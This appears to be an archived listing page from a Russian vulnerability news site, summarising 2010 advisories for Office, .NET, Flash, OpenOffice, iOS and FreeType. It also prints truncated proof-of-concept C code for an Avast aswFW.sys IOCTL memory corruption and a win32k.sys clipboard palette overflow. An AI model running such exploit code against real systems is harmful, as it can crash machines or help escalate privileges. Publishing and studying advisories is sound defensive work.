SgW32 Четверг, 25.05.2017, 00:23
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
Меню сайта

Разделы новостей
Уязвимости [106]
Релизы [7]
Туториалы [0]
Новости сайта [2]
Инетересности [2]
Другое [1]

Наш опрос
Каких программ на сайте не хватает?
Всего ответов: 72

Главная » Архив материалов
Добавил эксплоиты на следущие программы:

MS Windows win32k.sys Heap Overflow PoC

Цель: Microsoft Windows XP, 2003, Vista, 2008, 7
Воздействие: Отказ в обслуживании
07 августа, 2010 (просмотров: 869 )
Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption PoC

Цель: Avast! Internet Security 5.0
Воздействие: Отказ в обслуживании
06 августа, 2010 (просмотров: 411 )
Xerver 4.32 Source Disclosure and HTTP Authentication Bypass Exploit (Meta)

Цель: Xerver 4.32
Воздействие: Раскрытие данных
02 августа, 2010 (просмотров: 462 )
Barcodewiz 3.29 Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)

Цель: Barcodewiz 3.29
Воздействие: Выполнение произвольного кода
01 августа, 2010 (просмотров: 495 )
Xion Audio Player 1.0.125 Denial of Service PoC

Цель: Xion Audio Player 1.0.125
Воздействие: Отказ в обслуживании
01 августа, 2010 (просмотров: 422 )
Xmyplay 3.5.1 Denial Of Service ... Читать дальше »
Категория: Уязвимости | Просмотров: 714 | Добавил: Sgw32 | Дата: 11.08.2010 | Комментарии (0)

Цель: Avast! Internet Security 5.0
Воздействие: Отказ в обслуживании

Целочисленное переполнение обнаружено в драйвере устройства aswFW.sys. Локальный пользователь может с помощью специально сформированного 0x829C0964 IOCTL запроса вызвать повреждение памяти и аварийно завершить работу приложения.

#include "stdafx.h"  

#include "windows.h"  

#include "winioctl.h"  

#include "stdio.h"  

  

int main(void)  

{  

  HANDLE hFile = NULL;  

  ULONG ioctl_code = 0;  

  CHAR outBuf[32];  

  CHAR rpt_inBuf[102400];  

  DWORD dwRet = 0, ret = 0;  

  

  hFile = CreateFile("\\\\.\\aswFW", FILE_SHARE_READ | F ... Читать дальше »
Категория: Уязвимости | Просмотров: 495 | Добавил: Sgw32 | Дата: 11.08.2010 | Комментарии (0)

11 августа, 2010

Программа:
Microsoft Office XP
Microsoft Office 2003
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки PivotTable Cache Data записей в .xls файлах. Удаленный пользователь может с помощью специально сформированного .xls файла вызвать переполнение стека и выполнить произвольный код на целевой системе.

URL производителя: www.microsoft.com

Решение: Установите исправление с сайта производит ... Читать дальше »

Категория: Уязвимости | Просмотров: 531 | Добавил: Sgw32 | Дата: 11.08.2010 | Комментарии (0)

11 августа, 2010

Программа:
Microsoft .NET Framework 2.0, 3.5, 3.5.1
Microsoft Silverlight версии 2 и 3

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует в .NET Framework при обработке делегирований виртуальных методов с помощью CLR (Common Language Runtime). Удаленный пользователь может с помощью специально сформированного .NET или Silverlight приложения выполнить произвольный код на целевой системе.

URL производителя: www.microsoft.com

Решение: Установите исправление с сайта производителя.

Microsoft .NET Framework ... Читать дальше »

Категория: Уязвимости | Просмотров: 380 | Добавил: Sgw32 | Дата: 11.08.2010 | Комментарии (0)

11 августа, 2010

Программа:
Adobe Flash Player 10.1.53.64 и более ранние версии
Adobe AIR 2.0.2.12610 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать целевую систему.

1. Уязвимость существует из-за ошибки в ActionScript Virtual Machine 1 (AVM1) при обработке команды "ActionPush". Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

2. Уязвимость существует из-за неизвестной ошибки. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

3. Уязвимость существует из-за неизвестной ошибки. Удаленный пользователь м ... Читать дальше »

Категория: Уязвимости | Просмотров: 547 | Добавил: Sgw32 | Дата: 11.08.2010 | Комментарии (0)

Эксплоит на C, эксплуатирует отказ в обслуживании в драйвере

win32k.sys


DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};

bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);

memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);

SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard(); ... Читать дальше »
Категория: Уязвимости | Просмотров: 871 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)


07 августа, 2010

Программа:
Microsoft Windows XP
Microsoft Windows 2003
Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за ошибки проверки границ данных в функции CreateDIBPalette() в драйвере win32k.sys при копировании значений цветов в фиксированный буфер во время создания DIB палитры. Локальный пользователь может вызвать переполнение буфера через GetClipboardData() API, указав слишком большое количество цветов (более 256) через поле "biClrUsed" в структуре BITMAPINFOHEADE ... Читать дальше »

Категория: Уязвимости | Просмотров: 699 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)

06 августа, 2010

Программа: OpenOffice.org 3.2.1 для Windows, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за ошибки усечения целочисленных при обработке определенных данных. Удаленный пользователь может с помощью специально сформированного файла вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

2. Уязвимость существует из-за целочисленного переполнения при обработке некоторых данных. Удаленный пользователь может с помощью специально сформированного файла вызвать переполнение динамической памяти и выполнить произвольный код на це ... Читать дальше »

Категория: Уязвимости | Просмотров: 355 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (1)


06 августа, 2010

Программа: Apple IPhone OS (iOS) 4.0.1, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют злоумышленнику повысить свои привилегии и выполнить произвольный код на устройстве.

1. Уязвимость существует из-за неизвестной ошибки в ядре, которая позволяет локальному пользователю повысить свои привилегии.

2. Уязвимость существует из-за ошибки при обработке определенных опкодов в CFF (Compact Font Format) шрифте, встроенном, например, в PDF файл. Удаленный пользователь может с помощью специально сформированного PDF файла вызвать повреждение памяти и выполнить произвольный код на целевой системе.

Примечание: уязвимости используются в настоящее время дл ... Читать дальше »

Категория: Уязвимости | Просмотров: 340 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)

Множественные уязвимости в FreeType

09 августа, 2010

Программа: FreeType 2.4.2, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за ошибок при обработке опкодов в Compact Font Format (CFF) шрифтах. Удаленный пользователь может с помощью специально сформированного CFF шрифта вызвать переполнение стека и выполнить произвольный код на целевой системе. Уязвимость относится к:
www.securitylab.ru/vulnerability/396494.php

2. Уязвимость существует из-за ошибки проверки границ данных в функции Mac_Read_POST_Resou ... Читать дальше »

Категория: Уязвимости | Просмотров: 391 | Добавил: Sgw32 | Дата: 09.08.2010 | Комментарии (0)

« 1 2 3 4 5 6 ... 14 15 »
Форма входа

Календарь новостей
«  Май 2017  »
ПнВтСрЧтПтСбВс
1234567
891011121314
15161718192021
22232425262728
293031

Поиск

Друзья сайта

    Integral Calculator
    Enter a function to integrate:

    Variable:

    Limit Calculator
    Enter a function to compute its limit:
    Limit variable: Compute at: Limit type

Статистика

Copyright Sgw32 Corporation © 2017 Используются технологии uCoz